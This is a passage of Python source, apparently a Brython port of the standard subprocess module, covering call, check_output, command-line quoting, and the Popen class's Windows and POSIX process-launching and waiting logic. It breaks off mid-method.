    # Maps sys.flags attribute name -> the single-letter CLI option.
    flag_opt_map = {
        'debug': 'd',
        # 'inspect': 'i',
        # 'interactive': 'i',
        'optimize': 'O',
        'dont_write_bytecode': 'B',
        'no_user_site': 's',
        'no_site': 'S',
        'ignore_environment': 'E',
        'verbose': 'v',
        'bytes_warning': 'b',
        'quiet': 'q',
        'hash_randomization': 'R',
    }
    args = []
    for flag, opt in flag_opt_map.items():
        v = getattr(sys.flags, flag)
        if v > 0:
            # Flag counts > 1 repeat the letter (e.g. -vv).
            args.append('-' + opt * v)
    for opt in sys.warnoptions:
        args.append('-W' + opt)
    return args


def call(*popenargs, timeout=None, **kwargs):
    """Run command with arguments.  Wait for command to complete or
    timeout, then return the returncode attribute.

    The arguments are the same as for the Popen constructor.  Example:

    retcode = call(["ls", "-l"])
    """
    with Popen(*popenargs, **kwargs) as p:
        try:
            return p.wait(timeout=timeout)
        except:
            # Deliberate bare except: kill the child on *any* error
            # (including timeout) and always re-raise.
            p.kill()
            p.wait()
            raise


def check_call(*popenargs, **kwargs):
    """Run command with arguments.  Wait for command to complete.  If
    the exit code was zero then return, otherwise raise
    CalledProcessError.  The CalledProcessError object will have the
    return code in the returncode attribute.

    The arguments are the same as for the call function.  Example:

    check_call(["ls", "-l"])
    """
    retcode = call(*popenargs, **kwargs)
    if retcode:
        cmd = kwargs.get("args")
        if cmd is None:
            cmd = popenargs[0]
        raise CalledProcessError(retcode, cmd)
    return 0


def check_output(*popenargs, timeout=None, **kwargs):
    r"""Run command with arguments and return its output.

    If the exit code was non-zero it raises a CalledProcessError.  The
    CalledProcessError object will have the return code in the returncode
    attribute and output in the output attribute.

    The arguments are the same as for the Popen constructor.  Example:

    >>> check_output(["ls", "-l", "/dev/null"])
    b'crw-rw-rw- 1 root root 1, 3 Oct 18  2007 /dev/null\n'

    The stdout argument is not allowed as it is used internally.
    To capture standard error in the result, use stderr=STDOUT.

    >>> check_output(["/bin/sh", "-c",
    ...               "ls -l non_existent_file ; exit 0"],
    ...              stderr=STDOUT)
    b'ls: non_existent_file: No such file or directory\n'

    If universal_newlines=True is passed, the return value will be a
    string rather than bytes.
    """
    if 'stdout' in kwargs:
        raise ValueError('stdout argument not allowed, it will be overridden.')
    with Popen(*popenargs, stdout=PIPE, **kwargs) as process:
        try:
            output, unused_err = process.communicate(timeout=timeout)
        except TimeoutExpired:
            # Re-raise with whatever partial output was collected so the
            # caller can inspect it.
            process.kill()
            output, unused_err = process.communicate()
            raise TimeoutExpired(process.args, timeout, output=output)
        except:
            # Deliberate bare except: always re-raised after cleanup.
            process.kill()
            process.wait()
            raise
        retcode = process.poll()
        if retcode:
            raise CalledProcessError(retcode, process.args, output=output)
    return output


def list2cmdline(seq):
    """
    Translate a sequence of arguments into a command line
    string, using the same rules as the MS C runtime:

    1) Arguments are delimited by white space, which is either a
       space or a tab.

    2) A string surrounded by double quotation marks is
       interpreted as a single argument, regardless of white space
       contained within.  A quoted string can be embedded in an
       argument.

    3) A double quotation mark preceded by a backslash is
       interpreted as a literal double quotation mark.

    4) Backslashes are interpreted literally, unless they
       immediately precede a double quotation mark.

    5) If backslashes immediately precede a double quotation mark,
       every pair of backslashes is interpreted as a literal
       backslash.  If the number of backslashes is odd, the last
       backslash escapes the next double quotation mark as
       described in rule 3.
""" # See # http://msdn.microsoft.com/en-us/library/17w5ykft.aspx # or search http://msdn.microsoft.com for # "Parsing C++ Command-Line Arguments" result = [] needquote = False for arg in seq: bs_buf = [] # Add a space to separate this argument from the others if result: result.append(' ') needquote = (" " in arg) or ("\t" in arg) or not arg if needquote: result.append('"') for c in arg: if c == '\\': # Don't know if we need to double yet. bs_buf.append(c) elif c == '"': # Double backslashes. result.append('\\' * len(bs_buf)*2) bs_buf = [] result.append('\\"') else: # Normal char if bs_buf: result.extend(bs_buf) bs_buf = [] result.append(c) # Add remaining backslashes, if any. if bs_buf: result.extend(bs_buf) if needquote: result.extend(bs_buf) result.append('"') return ''.join(result) # Various tools for executing commands and looking at their output and status. # # NB This only works (and is only relevant) for POSIX. def getstatusoutput(cmd): """Return (status, output) of executing cmd in a shell. Execute the string 'cmd' in a shell with os.popen() and return a 2-tuple (status, output). cmd is actually run as '{ cmd ; } 2>&1', so that the returned output will contain output or error messages. A trailing newline is stripped from the output. The exit status for the command can be interpreted according to the rules for the C function wait(). Example: >>> import subprocess >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file or directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: not found') """ with os.popen('{ ' + cmd + '; } 2>&1', 'r') as pipe: try: text = pipe.read() sts = pipe.close() except: process = pipe._proc process.kill() process.wait() raise if sts is None: sts = 0 if text[-1:] == '\n': text = text[:-1] return sts, text def getoutput(cmd): """Return output (stdout or stderr) of executing cmd in a shell. 
    Like getstatusoutput(), except the exit status is ignored and the return
    value is a string containing the command's output.  Example:

    >>> import subprocess
    >>> subprocess.getoutput('ls /bin/ls')
    '/bin/ls'
    """
    return getstatusoutput(cmd)[1]


# Sentinel: distinguishes "close_fds not passed" from an explicit value.
_PLATFORM_DEFAULT_CLOSE_FDS = object()


class Popen(object):
    def __init__(self, args, bufsize=-1, executable=None,
                 stdin=None, stdout=None, stderr=None,
                 preexec_fn=None, close_fds=_PLATFORM_DEFAULT_CLOSE_FDS,
                 shell=False, cwd=None, env=None, universal_newlines=False,
                 startupinfo=None, creationflags=0,
                 restore_signals=True, start_new_session=False,
                 pass_fds=()):
        """Create new Popen instance."""
        # Reap any zombies left behind by previously deleted Popen objects.
        _cleanup()

        self._child_created = False
        self._input = None
        self._communication_started = False
        if bufsize is None:
            bufsize = -1  # Restore default
        if not isinstance(bufsize, int):
            raise TypeError("bufsize must be an integer")

        if mswindows:
            if preexec_fn is not None:
                raise ValueError("preexec_fn is not supported on Windows "
                                 "platforms")
            any_stdio_set = (stdin is not None or stdout is not None or
                             stderr is not None)
            if close_fds is _PLATFORM_DEFAULT_CLOSE_FDS:
                # Windows cannot close fds while also inheriting redirected
                # standard handles, so the default depends on redirection.
                if any_stdio_set:
                    close_fds = False
                else:
                    close_fds = True
            elif close_fds and any_stdio_set:
                raise ValueError(
                        "close_fds is not supported on Windows platforms"
                        " if you redirect stdin/stdout/stderr")
        else:
            # POSIX
            if close_fds is _PLATFORM_DEFAULT_CLOSE_FDS:
                close_fds = True
            if pass_fds and not close_fds:
                warnings.warn("pass_fds overriding close_fds.", RuntimeWarning)
                close_fds = True
            if startupinfo is not None:
                raise ValueError("startupinfo is only supported on Windows "
                                 "platforms")
            if creationflags != 0:
                raise ValueError("creationflags is only supported on Windows "
                                 "platforms")

        self.args = args
        self.stdin = None
        self.stdout = None
        self.stderr = None
        self.pid = None
        self.returncode = None
        self.universal_newlines = universal_newlines

        # Input and output objects.
        # The general principle is like
        # this:
        #
        # Parent                   Child
        # ------                   -----
        # p2cwrite   ---stdin--->  p2cread
        # c2pread    <--stdout---  c2pwrite
        # errread    <--stderr---  errwrite
        #
        # On POSIX, the child objects are file descriptors.  On
        # Windows, these are Windows file handles.  The parent objects
        # are file descriptors on both platforms.  The parent objects
        # are -1 when not using PIPEs. The child objects are -1
        # when not redirecting.

        (p2cread, p2cwrite,
         c2pread, c2pwrite,
         errread, errwrite) = self._get_handles(stdin, stdout, stderr)

        # We wrap OS handles *before* launching the child, otherwise a
        # quickly terminating child could make our fds unwrappable
        # (see #8458).
        # NOTE(review): the msvcrt wrapping below was commented out by the
        # Brython port ("fix me brython syntax error") and is kept disabled.
        #fix me brython syntax error
        #if mswindows:
        #    if p2cwrite != -1:
        #        p2cwrite = msvcrt.open_osfhandle(p2cwrite.Detach(), 0)
        #    if c2pread != -1:
        #        c2pread = msvcrt.open_osfhandle(c2pread.Detach(), 0)
        #    if errread != -1:
        #        errread = msvcrt.open_osfhandle(errread.Detach(), 0)

        if p2cwrite != -1:
            self.stdin = io.open(p2cwrite, 'wb', bufsize)
            if universal_newlines:
                self.stdin = io.TextIOWrapper(self.stdin, write_through=True)
        if c2pread != -1:
            self.stdout = io.open(c2pread, 'rb', bufsize)
            if universal_newlines:
                self.stdout = io.TextIOWrapper(self.stdout)
        if errread != -1:
            self.stderr = io.open(errread, 'rb', bufsize)
            if universal_newlines:
                self.stderr = io.TextIOWrapper(self.stderr)

        self._closed_child_pipe_fds = False
        try:
            self._execute_child(args, executable, preexec_fn, close_fds,
                                pass_fds, cwd, env,
                                startupinfo, creationflags, shell,
                                p2cread, p2cwrite,
                                c2pread, c2pwrite,
                                errread, errwrite,
                                restore_signals, start_new_session)
        except:
            # Cleanup if the child failed starting.
            for f in filter(None, (self.stdin, self.stdout, self.stderr)):
                try:
                    f.close()
                except EnvironmentError:
                    pass  # Ignore EBADF or other errors.
            if not self._closed_child_pipe_fds:
                # _execute_child normally closes the child's pipe ends; if it
                # failed before doing so, close them here to avoid fd leaks.
                to_close = []
                if stdin == PIPE:
                    to_close.append(p2cread)
                if stdout == PIPE:
                    to_close.append(c2pwrite)
                if stderr == PIPE:
                    to_close.append(errwrite)
                if hasattr(self, '_devnull'):
                    to_close.append(self._devnull)
                for fd in to_close:
                    try:
                        os.close(fd)
                    except EnvironmentError:
                        pass

            raise

    def _translate_newlines(self, data, encoding):
        # Decode bytes and normalize all newline conventions to "\n".
        data = data.decode(encoding)
        return data.replace("\r\n", "\n").replace("\r", "\n")

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        if self.stdout:
            self.stdout.close()
        if self.stderr:
            self.stderr.close()
        if self.stdin:
            self.stdin.close()
        # Wait for the process to terminate, to avoid zombies.
        self.wait()

    def __del__(self, _maxsize=sys.maxsize, _active=_active):
        # If __init__ hasn't had a chance to execute (e.g. if it
        # was passed an undeclared keyword argument), we don't
        # have a _child_created attribute at all.
        if not getattr(self, '_child_created', False):
            # We didn't get to successfully create a child process.
            return
        # In case the child hasn't been waited on, check if it's done.
        self._internal_poll(_deadstate=_maxsize)
        if self.returncode is None and _active is not None:
            # Child is still running, keep us alive until we can wait on it.
            _active.append(self)

    def _get_devnull(self):
        # Lazily open os.devnull once and reuse the fd for DEVNULL redirects.
        if not hasattr(self, '_devnull'):
            self._devnull = os.open(os.devnull, os.O_RDWR)
        return self._devnull

    def communicate(self, input=None, timeout=None):
        """Interact with process: Send data to stdin.  Read data from
        stdout and stderr, until end-of-file is reached.  Wait for
        process to terminate.  The optional input argument should be
        bytes to be sent to the child process, or None, if no data
        should be sent to the child.
        communicate() returns a tuple (stdout, stderr)."""

        if self._communication_started and input:
            raise ValueError("Cannot send input after starting communication")

        # Optimization: If we are not worried about timeouts, we haven't
        # started communicating, and we have one or zero pipes, using select()
        # or threads is unnecessary.
        if (timeout is None and not self._communication_started and
            [self.stdin, self.stdout, self.stderr].count(None) >= 2):
            stdout = None
            stderr = None
            if self.stdin:
                if input:
                    try:
                        self.stdin.write(input)
                    except IOError as e:
                        # Broken pipe / invalid fd just means the child went
                        # away; anything else is a real error.
                        if e.errno != errno.EPIPE and e.errno != errno.EINVAL:
                            raise
                self.stdin.close()
            elif self.stdout:
                stdout = _eintr_retry_call(self.stdout.read)
                self.stdout.close()
            elif self.stderr:
                stderr = _eintr_retry_call(self.stderr.read)
                self.stderr.close()
            self.wait()
        else:
            if timeout is not None:
                endtime = _time() + timeout
            else:
                endtime = None

            try:
                stdout, stderr = self._communicate(input, endtime, timeout)
            finally:
                self._communication_started = True

            sts = self.wait(timeout=self._remaining_time(endtime))

        return (stdout, stderr)

    def poll(self):
        return self._internal_poll()

    def _remaining_time(self, endtime):
        """Convenience for _communicate when computing timeouts."""
        if endtime is None:
            return None
        else:
            return endtime - _time()

    def _check_timeout(self, endtime, orig_timeout):
        """Convenience for checking if a timeout has expired."""
        if endtime is None:
            return
        if _time() > endtime:
            raise TimeoutExpired(self.args, orig_timeout)

    if mswindows:
        #
        # Windows methods
        #
        def _get_handles(self, stdin, stdout, stderr):
            """Construct and return tuple with IO objects:
            p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite
            """
            if stdin is None and stdout is None and stderr is None:
                return (-1, -1, -1, -1, -1, -1)

            p2cread, p2cwrite = -1, -1
            c2pread, c2pwrite = -1, -1
            errread, errwrite = -1, -1

            if stdin is None:
                p2cread = _winapi.GetStdHandle(_winapi.STD_INPUT_HANDLE)
                if p2cread is None:
                    # No usable stdin handle (e.g. GUI app): create a dummy
                    # pipe and keep only the read end.
                    p2cread, _ = _winapi.CreatePipe(None, 0)
                    p2cread = Handle(p2cread)
                    _winapi.CloseHandle(_)
            elif stdin == PIPE:
                p2cread, p2cwrite = _winapi.CreatePipe(None, 0)
                p2cread, p2cwrite = Handle(p2cread), Handle(p2cwrite)
            elif stdin == DEVNULL:
                p2cread = msvcrt.get_osfhandle(self._get_devnull())
            elif isinstance(stdin, int):
                p2cread = msvcrt.get_osfhandle(stdin)
            else:
                # Assuming file-like object
                p2cread = msvcrt.get_osfhandle(stdin.fileno())
            p2cread = self._make_inheritable(p2cread)

            if stdout is None:
                c2pwrite = _winapi.GetStdHandle(_winapi.STD_OUTPUT_HANDLE)
                if c2pwrite is None:
                    # No usable stdout handle: dummy pipe, keep write end.
                    _, c2pwrite = _winapi.CreatePipe(None, 0)
                    c2pwrite = Handle(c2pwrite)
                    _winapi.CloseHandle(_)
            elif stdout == PIPE:
                c2pread, c2pwrite = _winapi.CreatePipe(None, 0)
                c2pread, c2pwrite = Handle(c2pread), Handle(c2pwrite)
            elif stdout == DEVNULL:
                c2pwrite = msvcrt.get_osfhandle(self._get_devnull())
            elif isinstance(stdout, int):
                c2pwrite = msvcrt.get_osfhandle(stdout)
            else:
                # Assuming file-like object
                c2pwrite = msvcrt.get_osfhandle(stdout.fileno())
            c2pwrite = self._make_inheritable(c2pwrite)

            if stderr is None:
                errwrite = _winapi.GetStdHandle(_winapi.STD_ERROR_HANDLE)
                if errwrite is None:
                    # No usable stderr handle: dummy pipe, keep write end.
                    _, errwrite = _winapi.CreatePipe(None, 0)
                    errwrite = Handle(errwrite)
                    _winapi.CloseHandle(_)
            elif stderr == PIPE:
                errread, errwrite = _winapi.CreatePipe(None, 0)
                errread, errwrite = Handle(errread), Handle(errwrite)
            elif stderr == STDOUT:
                errwrite = c2pwrite
            elif stderr == DEVNULL:
                errwrite = msvcrt.get_osfhandle(self._get_devnull())
            elif isinstance(stderr, int):
                errwrite = msvcrt.get_osfhandle(stderr)
            else:
                # Assuming file-like object
                errwrite = msvcrt.get_osfhandle(stderr.fileno())
            errwrite = self._make_inheritable(errwrite)

            return (p2cread, p2cwrite,
                    c2pread, c2pwrite,
                    errread, errwrite)

        def _make_inheritable(self, handle):
            """Return a duplicate of handle, which is inheritable"""
            h = _winapi.DuplicateHandle(
                _winapi.GetCurrentProcess(), handle,
                _winapi.GetCurrentProcess(), 0, 1,
                _winapi.DUPLICATE_SAME_ACCESS)
            return Handle(h)

        def _find_w9xpopen(self):
            """Find and return absolute path to
            w9xpopen.exe"""
            w9xpopen = os.path.join(
                            os.path.dirname(_winapi.GetModuleFileName(0)),
                            "w9xpopen.exe")
            if not os.path.exists(w9xpopen):
                # Eeek - file-not-found - possibly an embedding
                # situation - see if we can locate it in sys.exec_prefix
                w9xpopen = os.path.join(os.path.dirname(sys.base_exec_prefix),
                                        "w9xpopen.exe")
                if not os.path.exists(w9xpopen):
                    raise RuntimeError("Cannot locate w9xpopen.exe, which is "
                                       "needed for Popen to work with your "
                                       "shell or platform.")
            return w9xpopen

        def _execute_child(self, args, executable, preexec_fn, close_fds,
                           pass_fds, cwd, env,
                           startupinfo, creationflags, shell,
                           p2cread, p2cwrite,
                           c2pread, c2pwrite,
                           errread, errwrite,
                           unused_restore_signals, unused_start_new_session):
            """Execute program (MS Windows version)"""

            assert not pass_fds, "pass_fds not supported on Windows."

            if not isinstance(args, str):
                args = list2cmdline(args)

            # Process startup details
            if startupinfo is None:
                startupinfo = STARTUPINFO()
            if -1 not in (p2cread, c2pwrite, errwrite):
                startupinfo.dwFlags |= _winapi.STARTF_USESTDHANDLES
                startupinfo.hStdInput = p2cread
                startupinfo.hStdOutput = c2pwrite
                startupinfo.hStdError = errwrite

            if shell:
                startupinfo.dwFlags |= _winapi.STARTF_USESHOWWINDOW
                startupinfo.wShowWindow = _winapi.SW_HIDE
                comspec = os.environ.get("COMSPEC", "cmd.exe")
                args = '{} /c "{}"'.format(comspec, args)
                if (_winapi.GetVersion() >= 0x80000000 or
                        os.path.basename(comspec).lower() == "command.com"):
                    # Win9x, or using command.com on NT. We need to
                    # use the w9xpopen intermediate program. For more
                    # information, see KB Q150956
                    # (http://web.archive.org/web/20011105084002/http://support.microsoft.com/support/kb/articles/Q150/9/56.asp)
                    w9xpopen = self._find_w9xpopen()
                    args = '"%s" %s' % (w9xpopen, args)
                    # Not passing CREATE_NEW_CONSOLE has been known to
                    # cause random failures on win9x.  Specifically a
                    # dialog: "Your program accessed mem currently in
                    # use at xxx" and a hopeful warning about the
                    # stability of your system.
                    # Cost is Ctrl+C won't kill children.
                    creationflags |= _winapi.CREATE_NEW_CONSOLE

            # Start the process
            try:
                hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
                                         # no special security
                                         None, None,
                                         int(not close_fds),
                                         creationflags,
                                         env,
                                         cwd,
                                         startupinfo)
            except pywintypes.error as e:
                # Translate pywintypes.error to WindowsError, which is
                # a subclass of OSError.  FIXME: We should really
                # translate errno using _sys_errlist (or similar), but
                # how can this be done from Python?
                raise WindowsError(*e.args)
            finally:
                # Child is launched. Close the parent's copy of those pipe
                # handles that only the child should have open.  You need
                # to make sure that no handles to the write end of the
                # output pipe are maintained in this process or else the
                # pipe will not close when the child process exits and the
                # ReadFile will hang.
                if p2cread != -1:
                    p2cread.Close()
                if c2pwrite != -1:
                    c2pwrite.Close()
                if errwrite != -1:
                    errwrite.Close()
                if hasattr(self, '_devnull'):
                    os.close(self._devnull)

            # Retain the process handle, but close the thread handle
            self._child_created = True
            self._handle = Handle(hp)
            self.pid = pid
            _winapi.CloseHandle(ht)

        def _internal_poll(self, _deadstate=None,
                _WaitForSingleObject=_winapi.WaitForSingleObject,
                _WAIT_OBJECT_0=_winapi.WAIT_OBJECT_0,
                _GetExitCodeProcess=_winapi.GetExitCodeProcess):
            """Check if child process has terminated.  Returns returncode
            attribute.

            This method is called by __del__, so it can only refer to objects
            in its local scope.

            """
            # The _winapi callables are bound as default arguments so they
            # survive interpreter shutdown when called from __del__.
            if self.returncode is None:
                if _WaitForSingleObject(self._handle, 0) == _WAIT_OBJECT_0:
                    self.returncode = _GetExitCodeProcess(self._handle)
            return self.returncode

        def wait(self, timeout=None, endtime=None):
            """Wait for child process to terminate.
            Returns returncode attribute."""
            if endtime is not None:
                # endtime takes precedence over timeout when both are given.
                timeout = self._remaining_time(endtime)
            if timeout is None:
                timeout_millis = _winapi.INFINITE
            else:
                timeout_millis = int(timeout * 1000)
            if self.returncode is None:
                result = _winapi.WaitForSingleObject(self._handle,
                                                     timeout_millis)
                if result == _winapi.WAIT_TIMEOUT:
                    raise TimeoutExpired(self.args, timeout)
                self.returncode = _winapi.GetExitCodeProcess(self._handle)
            return self.returncode

        def _readerthread(self, fh, buffer):
            # Drain the whole pipe in one call, then close it; runs in a
            # daemon thread started by _communicate.
            buffer.append(fh.read())
            fh.close()

        def _communicate(self, input, endtime, orig_timeout):
            # Start reader threads feeding into a list hanging off of this
            # object, unless they've already been started.
            if self.stdout and not hasattr(self, "_stdout_buff"):
                self._stdout_buff = []
                self.stdout_thread = \
                        threading.Thread(target=self._readerthread,
                                         args=(self.stdout, self._stdout_buff))
                self.stdout_thread.daemon = True
                self.stdout_thread.start()
            if self.stderr and not hasattr(self, "_stderr_buff"):
                self._stderr_buff = []
                self.stderr_thread = \
                        threading.Thread(target=self._readerthread,
                                         args=(self.stderr, self._stderr_buff))
                self.stderr_thread.daemon = True
                self.stderr_thread.start()

            if self.stdin:
                if input is not None:
                    try:
                        self.stdin.write(input)
                    except IOError as e:
                        # EPIPE just means the child exited early.
                        if e.errno != errno.EPIPE:
                            raise
                self.stdin.close()

            # Wait for the reader threads, or time out.  If we time out, the
            # threads remain reading and the fds left open in case the user
            # calls communicate again.
            if self.stdout is not None:
                self.stdout_thread.join(self._remaining_time(endtime))
                if self.stdout_thread.is_alive():
                    raise TimeoutExpired(self.args, orig_timeout)
            if self.stderr is not None:
                self.stderr_thread.join(self._remaining_time(endtime))
                if self.stderr_thread.is_alive():
                    raise TimeoutExpired(self.args, orig_timeout)

            # Collect the output from and close both pipes, now that we know
            # both have been read successfully.
            stdout = None
            stderr = None
            if self.stdout:
                stdout = self._stdout_buff
                self.stdout.close()
            if self.stderr:
                stderr = self._stderr_buff
                self.stderr.close()

            # All data exchanged.  Translate lists into strings.
            # (Each reader thread appended exactly one element.)
            if stdout is not None:
                stdout = stdout[0]
            if stderr is not None:
                stderr = stderr[0]

            return (stdout, stderr)

        def send_signal(self, sig):
            """Send a signal to the process
            """
            if sig == signal.SIGTERM:
                self.terminate()
            elif sig == signal.CTRL_C_EVENT:
                os.kill(self.pid, signal.CTRL_C_EVENT)
            elif sig == signal.CTRL_BREAK_EVENT:
                os.kill(self.pid, signal.CTRL_BREAK_EVENT)
            else:
                raise ValueError("Unsupported signal: {}".format(sig))

        def terminate(self):
            """Terminates the process
            """
            try:
                _winapi.TerminateProcess(self._handle, 1)
            except PermissionError:
                # ERROR_ACCESS_DENIED (winerror 5) is received when the
                # process already died.
                rc = _winapi.GetExitCodeProcess(self._handle)
                if rc == _winapi.STILL_ACTIVE:
                    raise
                self.returncode = rc

        kill = terminate

    else:
        #
        # POSIX methods
        #
        def _get_handles(self, stdin, stdout, stderr):
            """Construct and return tuple with IO objects:
            p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite
            """
            p2cread, p2cwrite = -1, -1
            c2pread, c2pwrite = -1, -1
            errread, errwrite = -1, -1

            if stdin is None:
                pass
            elif stdin == PIPE:
                p2cread, p2cwrite = _create_pipe()
            elif stdin == DEVNULL:
                p2cread = self._get_devnull()
            elif isinstance(stdin, int):
                p2cread = stdin
            else:
                # Assuming file-like object
                p2cread = stdin.fileno()

            if stdout is None:
                pass
            elif stdout == PIPE:
                c2pread, c2pwrite = _create_pipe()
            elif stdout == DEVNULL:
                c2pwrite = self._get_devnull()
            elif isinstance(stdout, int):
                c2pwrite = stdout
            else:
                # Assuming file-like object
                c2pwrite = stdout.fileno()

            if stderr is None:
                pass
            elif stderr == PIPE:
                errread, errwrite = _create_pipe()
            elif stderr == STDOUT:
                errwrite = c2pwrite
            elif stderr == DEVNULL:
                errwrite = self._get_devnull()
            elif isinstance(stderr, int):
                errwrite = stderr
            else:
                # Assuming file-like object
                errwrite = stderr.fileno()

            return (p2cread, p2cwrite,
                    c2pread, c2pwrite,
                    errread, errwrite)

        def _close_fds(self, fds_to_keep):
            # Close every fd from 3 up to MAXFD except those listed.
            start_fd = 3
            for fd in sorted(fds_to_keep):
                if fd >= start_fd:
                    os.closerange(start_fd, fd)
                    start_fd = fd + 1
            if start_fd <= MAXFD:
                os.closerange(start_fd, MAXFD)

        def _execute_child(self, args, executable, preexec_fn, close_fds,
                           pass_fds, cwd, env,
                           startupinfo, creationflags, shell,
                           p2cread, p2cwrite,
                           c2pread, c2pwrite,
                           errread, errwrite,
                           restore_signals, start_new_session):
            """Execute program (POSIX version)"""

            if isinstance(args, (str, bytes)):
                args = [args]
            else:
                args = list(args)

            if shell:
                args = ["/bin/sh", "-c"] + args
                if executable:
                    args[0] = executable

            if executable is None:
                executable = args[0]
            orig_executable = executable

            # For transferring possible exec failure from child to parent.
            # Data format: "exception name:hex errno:description"
            # Pickle is not used; it is complex and involves memory allocation.
            errpipe_read, errpipe_write = _create_pipe()
            try:
                try:
                    # We must avoid complex work that could involve
                    # malloc or free in the child process to avoid
                    # potential deadlocks, thus we do all this here.
                    # and pass it to fork_exec()

                    if env is not None:
                        env_list = [os.fsencode(k) + b'=' + os.fsencode(v)
                                    for k, v in env.items()]
                    else:
                        env_list = None  # Use execv instead of execve.
                    executable = os.fsencode(executable)
                    if os.path.dirname(executable):
                        executable_list = (executable,)
                    else:
                        # This matches the behavior of os._execvpe().
                        executable_list = tuple(
                            os.path.join(os.fsencode(dir), executable)
                            for dir in os.get_exec_path(env))
                    fds_to_keep = set(pass_fds)
                    fds_to_keep.add(errpipe_write)
                    self.pid = _posixsubprocess.fork_exec(
                            args, executable_list,
                            close_fds, sorted(fds_to_keep), cwd, env_list,
                            p2cread, p2cwrite, c2pread, c2pwrite,
                            errread, errwrite,
                            errpipe_read, errpipe_write,
                            restore_signals, start_new_session, preexec_fn)
                    self._child_created = True
                finally:
                    # be sure the FD is closed no matter what
                    os.close(errpipe_write)

                # self._devnull is not always defined.
                devnull_fd = getattr(self, '_devnull', None)

                # Close the child's ends of the pipes in the parent; the
                # devnull fd (if any) is closed once at the end.
                if p2cread != -1 and p2cwrite != -1 and p2cread != devnull_fd:
                    os.close(p2cread)
                if c2pwrite != -1 and c2pread != -1 and c2pwrite != devnull_fd:
                    os.close(c2pwrite)
                if errwrite != -1 and errread != -1 and errwrite != devnull_fd:
                    os.close(errwrite)
                if devnull_fd is not None:
                    os.close(devnull_fd)
                # Prevent a double close of these fds from __init__ on error.
                self._closed_child_pipe_fds = True

                # Wait for exec to fail or succeed; possibly raising an
                # exception (limited in size)
                errpipe_data = bytearray()
                while True:
                    part = _eintr_retry_call(os.read, errpipe_read, 50000)
                    errpipe_data += part
                    if not part or len(errpipe_data) > 50000:
                        break
            finally:
                # be sure the FD is closed no matter what
                os.close(errpipe_read)

            if errpipe_data:
                # The child wrote "ExcName:hexerrno:message" before dying;
                # reap it, then re-raise the failure in the parent.
                try:
                    _eintr_retry_call(os.waitpid, self.pid, 0)
                except OSError as e:
                    if e.errno != errno.ECHILD:
                        raise
                try:
                    exception_name, hex_errno, err_msg = (
                            errpipe_data.split(b':', 2))
                except ValueError:
                    exception_name = b'RuntimeError'
                    hex_errno = b'0'
                    err_msg = (b'Bad exception data from child: ' +
                               repr(errpipe_data))
                child_exception_type = getattr(
                        builtins, exception_name.decode('ascii'),
                        RuntimeError)
                err_msg = err_msg.decode(errors="surrogatepass")
                if issubclass(child_exception_type, OSError) and hex_errno:
                    errno_num = int(hex_errno, 16)
                    child_exec_never_called = (err_msg == "noexec")
                    if child_exec_never_called:
                        err_msg = ""
                    if errno_num != 0:
                        err_msg = os.strerror(errno_num)
                        if errno_num == errno.ENOENT:
                            if child_exec_never_called:
                                # The error must be from chdir(cwd).
                                err_msg += ': ' + repr(cwd)
                            else:
                                err_msg += ': ' + repr(orig_executable)
                    raise child_exception_type(errno_num, err_msg)
                raise child_exception_type(err_msg)

        def _handle_exitstatus(self, sts, _WIFSIGNALED=os.WIFSIGNALED,
                _WTERMSIG=os.WTERMSIG, _WIFEXITED=os.WIFEXITED,
                _WEXITSTATUS=os.WEXITSTATUS):
            # This method is called (indirectly) by __del__, so it cannot
            # refer to anything outside of its local scope.
            if _WIFSIGNALED(sts):
                # Killed by a signal: convention is a negative returncode.
                self.returncode = -_WTERMSIG(sts)
            elif _WIFEXITED(sts):
                self.returncode = _WEXITSTATUS(sts)
            else:
                # Should never happen
                raise RuntimeError("Unknown child exit status!")

        def _internal_poll(self, _deadstate=None, _waitpid=os.waitpid,
                _WNOHANG=os.WNOHANG, _os_error=os.error, _ECHILD=errno.ECHILD):
            """Check if child process has terminated.  Returns returncode
            attribute.

            This method is called by __del__, so it cannot reference anything
            outside of the local scope (nor can any methods it calls).

            """
            if self.returncode is None:
                try:
                    pid, sts = _waitpid(self.pid, _WNOHANG)
                    if pid == self.pid:
                        self._handle_exitstatus(sts)
                except _os_error as e:
                    if _deadstate is not None:
                        self.returncode = _deadstate
                    elif e.errno == _ECHILD:
                        # This happens if SIGCLD is set to be ignored or
                        # waiting for child processes has otherwise been
                        # disabled for our process.  This child is dead, we
                        # can't get the status.
                        # http://bugs.python.org/issue15756
                        self.returncode = 0
            return self.returncode

        def _try_wait(self, wait_flags):
            try:
                (pid, sts) = _eintr_retry_call(os.waitpid, self.pid,
                                               wait_flags)
            except OSError as e:
                if e.errno != errno.ECHILD:
                    raise
                # This happens if SIGCLD is set to be ignored or waiting
                # for child processes has otherwise been disabled for our
                # process.  This child is dead, we can't get the status.
                pid = self.pid
                sts = 0
            return (pid, sts)

        def wait(self, timeout=None, endtime=None):
            """Wait for child process to terminate.  Returns returncode
            attribute."""
            if self.returncode is not None:
                return self.returncode

            # endtime is preferred to timeout.
            # timeout is only used for printing.
            if endtime is not None or timeout is not None:
                if endtime is None:
                    endtime = _time() + timeout
                elif timeout is None:
                    timeout = self._remaining_time(endtime)

            if endtime is not None:
                # Enter a busy loop if we have a timeout.  This busy loop was
                # cribbed from Lib/threading.py in Thread.wait() at r71065.
                delay = 0.0005  # 500 us -> initial delay of 1 ms
                while True:
                    (pid, sts) = self._try_wait(os.WNOHANG)
                    assert pid == self.pid or pid == 0
                    if pid == self.pid:
                        self._handle_exitstatus(sts)
                        break
                    remaining = self._remaining_time(endtime)
                    if remaining <= 0:
                        raise TimeoutExpired(self.args, timeout)
                    # Exponential backoff capped at 50 ms and at the
                    # remaining time.
                    delay = min(delay * 2, remaining, .05)
                    time.sleep(delay)
            else:
                while self.returncode is None:
                    (pid, sts) = self._try_wait(0)
                    # Check the pid and loop as waitpid has been known to
                    # return 0 even without WNOHANG in odd situations.
                    # issue14396.
                    if pid == self.pid:
                        self._handle_exitstatus(sts)
            return self.returncode

        def _communicate(self, input, endtime, orig_timeout):
            if self.stdin and not self._communication_started:
                # Flush stdio buffer.  This might block, if the user has
